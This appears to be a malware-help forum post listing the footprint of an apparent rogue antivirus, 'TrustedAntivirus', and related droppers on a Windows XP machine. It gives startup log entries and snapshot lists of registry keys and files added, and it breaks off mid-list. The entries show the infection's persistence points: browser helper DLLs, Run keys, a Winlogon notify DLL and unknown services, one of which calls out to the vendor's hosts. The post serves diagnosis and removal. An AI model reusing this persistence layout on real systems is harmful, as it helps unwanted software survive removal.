O2 - BHO: (no name) - {0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD} - C:\Program Files\Internet Explorer\xabe89104.dll
O2 - BHO: (no name) - {22342B44-5B98-4B30-9D53-C182AD8DF217} - C:\WINDOWS\system32\fccbbya.dll
O2 - BHO: CIEIntegrator Object - {5C3F6257-3E00-45C2-88D5-CB0F3A17BF0E} - C:\Program Files\TrustedAntivirus\Tools\pblock.dll
O2 - BHO: IEFW Object - {6F87F145-DC2D-4766-AF03-3A3B96FFAD98} - C:\Program Files\TrustedAntivirus\Tools\sbiebho.dll
O4 - HKLM\..\Run: [runner1] C:\WINDOWS\mrofinu1000106.exe 61A847B5BBF72813329B385772FF01F0B3E35B6638993F4661AA4EBD86D67C56389B284534F310
O4 - HKLM\..\Run: [TrustedAntivirus] C:\Program Files\TrustedAntivirus\pgs.exe
O4 - HKLM\..\Run: [ugac] "C:\PROGRA~1\COMMON~1\TRUSTE~1\ugac.exe" -start
O4 - HKLM\..\Run: [bm] "C:\Program Files\Common Files\TrustedAntivirus\bm.exe" dm=http://trustedantivirus.com ad=http://trustedantivirus.com sd=http://ykeeper.trustedantivirus.com
O4 - HKLM\..\Run: [ptask] C:\Program Files\TrustedAntivirus\ptask.exe
O4 - HKLM\..\RunOnce: [overinstall] "C:\Program Files\TrustedAntivirus\pgs.exe" /empty
O4 - Startup: DW_Start.lnk = ?
O20 - Winlogon Notify: fccbbya - C:\WINDOWS\SYSTEM32\fccbbya.dll
O23 - Service: Command Service (cmdService) - Unknown owner - C:\WINDOWS\S0xZ\command.exe
O23 - Service: Network Monitor - Unknown owner - C:\Program Files\Network Monitor\netmon.exe
--
End of file - 5143 bytes
Note: I left out all legit entries.
Kimberly
Registry.

QUOTE
Keys ignored: 0
---------------
* (none)

Keys added:
---------------
HKEY_CURRENT_USER\Software\Microsoft\Installer
HKEY_CURRENT_USER\Software\Microsoft\Windows Script
HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings
HKEY_CURRENT_USER\Software\mozilla.org
HKEY_CURRENT_USER\Software\mozilla.org\Mozilla
HKEY_CURRENT_USER\Software\Opera Software
HKEY_CURRENT_USER\Software\TrustedAntivirus
HKEY_CURRENT_USER\Software\TrustedAntivirus\Settings
HKEY_CLASSES_ROOT\AppID\{EA7522F6-87CF-411e-8A55-19EE4344B676}
HKEY_CLASSES_ROOT\AppID\pblock.DLL
HKEY_CLASSES_ROOT\CLSID\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}
HKEY_CLASSES_ROOT\CLSID\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}\InProcServer32
HKEY_CLASSES_ROOT\CLSID\{22342B44-5B98-4B30-9D53-C182AD8DF217}
HKEY_CLASSES_ROOT\CLSID\{22342B44-5B98-4B30-9D53-C182AD8DF217}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Control
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Programmable
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID
HKEY_CLASSES_ROOT\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\ProgID
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\Programmable
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{5C3F6257-3E00-45c2-88D5-CB0F3A17BF0E}\VersionIndependentProgID
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\ProgID
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\Programmable
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\TypeLib
HKEY_CLASSES_ROOT\CLSID\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}\VersionIndependentProgID
HKEY_CLASSES_ROOT\InetCtls.Inet
HKEY_CLASSES_ROOT\InetCtls.Inet\CLSID
HKEY_CLASSES_ROOT\InetCtls.Inet\CurVer
HKEY_CLASSES_ROOT\InetCtls.Inet.1
HKEY_CLASSES_ROOT\InetCtls.Inet.1\CLSID
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32
HKEY_CLASSES_ROOT\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32
HKEY_CLASSES_ROOT\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB\CLSID
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB\CurVer
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB.1
HKEY_CLASSES_ROOT\PopupBlocker.IEGPB.1\CLSID
HKEY_CLASSES_ROOT\SBIEBHO.IEFW
HKEY_CLASSES_ROOT\SBIEBHO.IEFW\CLSID
HKEY_CLASSES_ROOT\SBIEBHO.IEFW\CurVer
HKEY_CLASSES_ROOT\SBIEBHO.IEFW.2
HKEY_CLASSES_ROOT\SBIEBHO.IEFW.2\CLSID
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\HELPDIR
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{D761645B-6B20-4698-AEE8-729981152A82}\1.0\HELPDIR
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{EA7522F6-87CF-411E-8A55-19EE4344B676}\1.0\HELPDIR
HKEY_CLASSES_ROOT\WR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\24ebc7a7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DownloadManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{22342B44-5B98-4B30-9D53-C182AD8DF217}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C3F6257-3E00-45C2-88D5-CB0F3A17BF0E}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6F87F145-DC2D-4766-AF03-3A3B96FFAD98}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3877C2CD-F137-4144-BDB2-0A811492F920}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A394E835-C8D6-4B4B-884B-D2709059F3BE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Outerinfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UAVUN_is1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fccbbya
HKEY_LOCAL_MACHINE\SOFTWARE\Products
HKEY_LOCAL_MACHINE\SOFTWARE\Rhao
HKEY_LOCAL_MACHINE\SOFTWARE\TrustedAntivirus
HKEY_LOCAL_MACHINE\SOFTWARE\TrustedAntivirus\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\ugac
HKEY_LOCAL_MACHINE\SOFTWARE\xpre
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CMDSERVICE\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCHINJDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_NETWORK_MONITOR\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dhlp\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mchInjDrv\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Network Monitor\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Network Monitor\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CMDSERVICE\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MCHINJDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NETWORK_MONITOR\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cmdService\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\dhlp\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mchInjDrv
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mchInjDrv\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor\Enum
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Network Monitor\Security


Values added & changed: see attachment (attachmentid=782).

Disk contents.
QUOTE
Drives tracked: 1
-----------------
* c:\

Folders added:
-----------------
c:\Documents and Settings\All Users\Application Data\SalesMon
c:\Documents and Settings\All Users\Application Data\SalesMon\Data
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802
c:\Documents and Settings\KLY\Local Settings\Temp\ScnTmp
c:\Documents and Settings\LocalService\Application Data\NetMon
c:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Internet Explorer
c:\Documents and Settings\NetworkService\Application Data\NetMon
c:\Program Files\Common Files\TrustedAntivirus
c:\Program Files\Network Monitor
c:\Program Files\TrustedAntivirus
c:\Program Files\TrustedAntivirus\Config
c:\Program Files\TrustedAntivirus\Dat
c:\Program Files\TrustedAntivirus\Engines
c:\Program Files\TrustedAntivirus\Engines\AWBase
c:\Program Files\TrustedAntivirus\Engines\AWBase\database
c:\Program Files\TrustedAntivirus\Engines\PGBase
c:\Program Files\TrustedAntivirus\Engines\plugins
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate
c:\Program Files\TrustedAntivirus\Graphics
c:\Program Files\TrustedAntivirus\LA
c:\Program Files\TrustedAntivirus\Tools
c:\Program Files\TrustedAntivirus\Up
c:\Program Files\TrustedAntivirus\Up\Download
c:\Temp
c:\Temp\1cb
c:\Temp\sanR24
c:\TrustedAntivirus
c:\TrustedAntivirus\AVQuar
c:\WINDOWS\S0xZ
c:\WINDOWS\system32\ax9
c:\WINDOWS\system32\bv2
c:\WINDOWS\system32\ev4
c:\WINDOWS\system32\iDlo01

Files added:
----------------
c:\Documents and Settings\All Users\Desktop\TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,599 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\Contact Customer Support.lnk
Date: 3/6/2008 11:02 PM
Size: 1,567 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,611 bytes
c:\Documents and Settings\All Users\Start Menu\Programs\TrustedAntivirus\Uninstall TrustedAntivirus.lnk
Date: 3/6/2008 11:02 PM
Size: 1,652 bytes
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs\threats.log
Date: 3/6/2008 11:02 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Application Data\TrustedAntivirus\Logs\update.log
Date: 3/6/2008 11:05 PM
Size: 4,251 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\~DF7077.tmp
Date: 3/6/2008 11:05 PM
Size: 327,680 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\~uavsetup.exe
Date: 3/6/2008 11:01 PM
Size: 15,712,233 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\removalfile.bat
Date: 3/6/2008 10:50 PM
Size: 43 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\sqlite_5J4QbTdgCcOLwo2
Date: 3/6/2008 11:03 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\sqlite_rEvawTY4Fgm0efD
Date: 3/6/2008 11:02 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\yazzsnet.exe
Date: 3/6/2008 10:37 PM
Size: 218,632 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp\UGA6P_0001_N122M2802NetInstaller.exe
Date: 2/28/2008 4:57 PM
Size: 185,344 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\ICD1.tmp\UGA6P_0001_N122M2802NetInstaller.inf
Date: 2/28/2008 4:57 PM
Size: 230 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\settings.ini
Date: 3/6/2008 11:03 PM
Size: 23 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\setup.exe
Date: 3/6/2008 11:00 PM
Size: 15,760,928 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\NI.UGA6P_0001_N122M2802\setup.len
Date: 3/6/2008 10:58 PM
Size: 4 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\CA6P2ZCX.HTM
Date: 3/6/2008 10:33 PM
Size: 1,176 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\CASNUHWN.HTM
Date: 3/6/2008 10:44 PM
Size: 1,176 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\230H05OX\serve[1].htm
Date: 3/6/2008 10:31 PM
Size: 945 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\install_en[1].cab
Date: 3/6/2008 10:44 PM
Size: 102,666 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\placeholder-1786909-2517323253[1].htm
Date: 3/6/2008 10:31 PM
Size: 1,443 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\GTCHOJAZ\tc2[1].txt
Date: 3/6/2008 11:03 PM
Size: 4,778 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\CAF2O7NP.htm
Date: 3/6/2008 10:44 PM
Size: 125 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\CASP67K1.htm
Date: 3/6/2008 11:03 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLQVS92F\data[1].htm
Date: 3/6/2008 10:44 PM
Size: 25,507 bytes
c:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\KLURCDYF\winavp[1].htm
Date: 3/6/2008 10:45 PM
Size: 502 bytes
c:\Documents and Settings\KLY\Start Menu\Programs\Startup\DW_Start.lnk
Date: 3/6/2008 10:47 PM
Size: 0 bytes
c:\Documents and Settings\LocalService\Application Data\NetMon\domains.txt
Date: 3/6/2008 11:07 PM
Size: 14 bytes
c:\Documents and Settings\LocalService\Application Data\NetMon\log.txt
Date: 3/6/2008 11:07 PM
Size: 372 bytes
c:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
Date: 3/6/2008 11:03 PM
Size: 16,384 bytes
c:\Documents and Settings\LocalService\Local Settings\History\History.IE5\MSHist012008030620080307\index.dat
Date: 3/6/2008 11:03 PM
Size: 32,768 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\1IXK5YVH\march_of_dimes_bg[1].gif
Date: 3/6/2008 11:03 PM
Size: 319 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\8XOTC1Z9\command_small[1].gif
Date: 3/6/2008 11:03 PM
Size: 2,417 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\8XOTC1Z9\march_of_dimes[1].gif
Date: 3/6/2008 11:03 PM
Size: 24,981 bytes
c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KFCF67AN\intro[1].htm
Date: 3/6/2008 11:03 PM
Size: 2,317 bytes
c:\Documents and Settings\NetworkService\Application Data\NetMon\domains.txt
Date: 3/6/2008 10:54 PM
Size: 14 bytes
c:\Documents and Settings\NetworkService\Application Data\NetMon\log.txt
Date: 3/6/2008 10:54 PM
Size: 248 bytes
c:\Program Files\Common Files\Yazzle1281OinAdmin.exe
Date: 1/15/2008 10:52 PM
Size: 140,800 bytes
c:\Program Files\Common Files\Yazzle1281OinUninstaller.exe
Date: 3/6/2008 10:50 PM
Size: 41,723 bytes
c:\Program Files\Common Files\TrustedAntivirus\bm.exe
Date: 12/20/2007 8:12 PM
Size: 425,984 bytes
c:\Program Files\Common Files\TrustedAntivirus\ugac.exe
Date: 5/22/2007 1:06 PM
Size: 271,360 bytes
c:\Program Files\Internet Explorer\xabe89104.dll
Date: 2/8/2008 2:07 AM
Size: 217,088 bytes
c:\Program Files\Network Monitor\netmon.exe
Date: 1/4/2006 6:09 PM
Size: 94,208 bytes
c:\Program Files\TrustedAntivirus\Activate.exe
Date: 7/31/2007 8:13 AM
Size: 152,064 bytes
c:\Program Files\TrustedAntivirus\al.dat
Date: 11/7/2007 5:31 PM
Size: 131 bytes
c:\Program Files\TrustedAntivirus\dhlp.dll
Date: 12/6/2007 8:20 PM
Size: 196,608 bytes
c:\Program Files\TrustedAntivirus\FWSettings.bin
Date: 3/6/2008 11:02 PM
Size: 18 bytes
c:\Program Files\TrustedAntivirus\history.db
Date: 3/6/2008 11:03 PM
Size: 23,552 bytes
c:\Program Files\TrustedAntivirus\main.log
Date: 3/6/2008 11:03 PM
Size: 790 bytes
c:\Program Files\TrustedAntivirus\pgs.exe
Date: 12/7/2007 11:03 AM
Size: 2,097,152 bytes
c:\Program Files\TrustedAntivirus\ptask.exe
Date: 11/27/2007 5:31 PM
Size: 28,672 bytes
c:\Program Files\TrustedAntivirus\reload.exe
Date: 11/27/2007 5:31 PM
Size: 161,792 bytes
c:\Program Files\TrustedAntivirus\ResErrors.log
Date: 3/6/2008 11:08 PM
Size: 84,524 bytes
c:\Program Files\TrustedAntivirus\scnkrnl.dll
Date: 11/27/2007 5:29 PM
Size: 569,344 bytes
c:\Program Files\TrustedAntivirus\settings.ini
Date: 3/6/2008 11:02 PM
Size: 1,641 bytes
c:\Program Files\TrustedAntivirus\sqlite3.dll
Date: 8/9/2006 10:29 AM
Size: 247,232 bytes
c:\Program Files\TrustedAntivirus\sr.log
Date: 3/6/2008 11:02 PM
Size: 232 bytes
c:\Program Files\TrustedAntivirus\unins000.dat
Date: 3/6/2008 11:02 PM
Size: 33,887 bytes
c:\Program Files\TrustedAntivirus\unins000.exe
Date: 3/6/2008 11:01 PM
Size: 682,364 bytes
c:\Program Files\TrustedAntivirus\Config\pgs.xml
Date: 3/6/2008 11:01 PM
Size: 8,819,841 bytes
c:\Program Files\TrustedAntivirus\Dat\Activate.dat
Date: 3/6/2008 11:02 PM
Size: 314 bytes
c:\Program Files\TrustedAntivirus\Dat\BkSites.dat
Date: 10/31/2007 12:20 PM
Size: 283,541 bytes
c:\Program Files\TrustedAntivirus\Dat\bnlink.dat
Date: 3/6/2008 11:02 PM
Size: 220 bytes
c:\Program Files\TrustedAntivirus\Dat\cd.dat
Date: 11/14/2007 11:15 AM
Size: 119 bytes
c:\Program Files\TrustedAntivirus\Dat\incmp.dat
Date: 4/5/2006 10:00 AM
Size: 129 bytes
c:\Program Files\TrustedAntivirus\Dat\index.dat
Date: 12/14/2006 3:17 PM
Size: 6 bytes
c:\Program Files\TrustedAntivirus\Dat\pv.dat
Date: 3/6/2008 11:02 PM
Size: 9 bytes
c:\Program Files\TrustedAntivirus\Engines\AWBase\vbpv.dat
Date: 7/13/2007 11:12 AM
Size: 10 bytes
c:\Program Files\TrustedAntivirus\Engines\AWBase\database\enemies.dat
Date: 7/13/2007 11:09 AM
Size: 11,642,713 bytes
c:\Program Files\TrustedAntivirus\Engines\PGBase\vbpv.dat
Date: 8/1/2005 3:42 PM
Size: 8 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\BORLNDMM.DLL
Date: 5/8/2007 12:10 PM
Size: 22,528 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANADWR.DLL
Date: 5/8/2007 11:58 AM
Size: 246,310 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANBCDR.DLL
Date: 5/8/2007 11:59 AM
